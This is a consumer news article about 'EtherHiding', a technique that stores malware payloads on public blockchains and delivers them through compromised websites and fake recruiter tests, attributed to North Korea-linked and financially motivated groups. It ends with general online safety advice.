Google discovers malware that hides online and robs your money

A new invisible online threat

You lock your doors at night, but what about your computer? Researchers have uncovered a sneaky new hacking trick that bypasses our usual online safeguards.

They call the technique EtherHiding. It stores encoded payloads on public blockchains and uses read-only queries, so the delivery step leaves fewer obvious network indicators for standard web scanners to detect.

Security teams have observed both a DPRK-linked cluster and a financially motivated cluster using EtherHiding.

Hiding malware in plain sight

So, how does this ghost hack actually work? Instead of sending a suspicious file, attackers hide malicious code inside a public blockchain. This is the same technology that powers cryptocurrencies like Bitcoin. Think of the blockchain as a massive, public digital ledger that nobody can erase or alter.

A small loader script on a compromised page will query a smart contract or transaction data via read-only API calls, retrieve an encoded JavaScript payload, and evaluate it in memory.

In many cases, the payload runs without a visible file download, though some campaigns still rely on social engineering to get victims to run a local command.

Why your security software misses it

This method complicates detection for site scanning and signature-based protections because the payload lives on a public blockchain and can be retrieved via read-only calls. However, endpoint detection and modern EDR tools may still flag suspicious in-memory behavior or unusual network calls.

The harmful code is simply fetched from a public, seemingly neutral source. This leaves your security software blind to the real danger happening right in front of it.

The attackers’ clever disguise

To start the infection, hackers first need you to visit a compromised site. They often break into legitimate, but poorly secured, websites built on platforms like WordPress. They do not take the whole site down, as that would be far too obvious.

Instead, they secretly inject a tiny, harmless-looking piece of code into the website’s framework. This small bit of code is the digital trapdoor, cleverly disguised to blend with normal website data. When your browser loads the page, it unknowingly runs this malicious script.

What happens after the infection

Once the hidden code is on your computer, the real damage begins. The malware can act as a silent spy, recording every keystroke to steal passwords and logins.

If the malware extracts browser wallet keys or session cookies from wallets like MetaMask or Phantom, attackers can drain those wallets or abuse session tokens to move funds.

In other cases, the malware might lock all your files and demand a ransom to unlock them. Since the hackers have a persistent backdoor into your system, they can also steal sensitive personal documents or company secrets.

The North Korean connection

Google Threat Intelligence Group reported DPRK-attributed activity using EtherHiding and tracked that cluster as UNC5342, while Mandiant and GTIG also documented a second, financially motivated cluster, tracked as UNC5142, using similar on-chain techniques.

This state-backed support means the hackers are well-resourced, highly skilled, and patient. They are part of a coordinated, national effort to steal money and gather intelligence. This makes them a particularly persistent and dangerous threat to everyone online.

The social engineering trick

Often, the hackers actively lure targets through clever social engineering. They might pose as recruiters on professional networks like LinkedIn, offering fake high-paying jobs in the tech industry. They engage in lengthy conversations to build trust with their potential victims.

Eventually, they send a “technical skills test” as part of the interview process. This file, hosted on a legitimate-looking site, contains the initial loader that connects to the blockchain. The victim, thinking they are taking a real test, willingly downloads and runs the file.

A shift in the cyber battlefield

Using blockchain for malware is a significant escalation in cybercrime. It represents a move toward next-generation bulletproof hosting. Hackers are exploiting the very features that make blockchain secure, its permanence and decentralization, to protect their own malicious operations.

If this technique becomes widespread, it could render many current digital defenses obsolete. Criminals of all kinds could launch attacks that are nearly impossible to trace or stop at their source. We could be facing a new era of persistent and invisible online threats.

How to fortify your digital defenses

While the threat is sophisticated, you are not powerless. The first line of defense is to keep all your software updated, especially your web browser and operating system. These updates often include patches for security flaws that hackers love to exploit.

Be extremely cautious about downloading files or clicking links, even from people you’ve just met online. If a “recruiter” asks you to run a program for an interview, it’s a major red flag. Legitimate companies have secure and transparent hiring processes.

The role of big tech and security firms

Google and other cybersecurity companies are actively tracking these threats. They are working on new ways to detect unusual activity, like monitoring for browser behavior that secretly communicates with blockchain networks. Their research is crucial for developing next-generation security tools.

These firms also collaborate with blockchain API providers and web hosting services. By identifying and blocking the intermediary services hackers use, they can disrupt the attack chain. This is a vital step, even if they cannot delete the malicious smart contract itself.

Why is this threat so effective

The core strength of this attack is its misuse of a trusted system. We are taught that blockchain is secure and transparent, so the idea that it can be used for harm is a clever trick. The hackers have found a way to weaponize trust itself.

Furthermore, the low cost and high resilience make it perfect for hackers. Updating the attack to deliver new malware can cost less than a dollar in transaction fees. Meanwhile, their attack platform is permanently hosted on an unstoppable global network.

Looking toward the future

Security experts are concerned that this is just the beginning. They warn that combining this blockchain-hiding technique with artificial intelligence could create self-spreading attacks. AI could help tailor more convincing phishing lures or automatically find new websites to compromise.

The battle between hackers and defenders is an ongoing arms race. As we develop new technologies, they find ways to abuse them. This latest development proves that the digital landscape is constantly changing, requiring our constant vigilance.

Curious about what’s next for your online privacy? See what happened when Google shut down its own major project.

Staying safe in a new digital era

Your best defense combines good technology with smart habits. Use a reputable security suite and enable safe browsing features for real-time protection against malicious sites. For an extra layer of security, consider using a browser that can block scripts from running automatically.

Always think before you click, and be skeptical of offers that seem too good to be true. The internet is an amazing tool, but it pays to be cautious. By staying aware of these new threats, you can significantly reduce your risk of falling victim.

Curious about how AI is being protected from misuse? Read about OpenAI’s recent move to block hacker accounts from using its platform.

What’s your best tip for staying safe online? Share your thoughts in the comments and give this a like if you found it useful.

Read More From This Brand:

• Is Apple quietly leaning on Google’s AI?
• Students get free access to Google AI tools
• EU scrutinizes Apple, Google, Microsoft over scams

Don’t forget to follow us for more exclusive content right here on MSN.

If you liked this story, you’ll LOVE our FREE emails. Join today and be the first to get stories like this one.

This slideshow was made with AI assistance and human editing.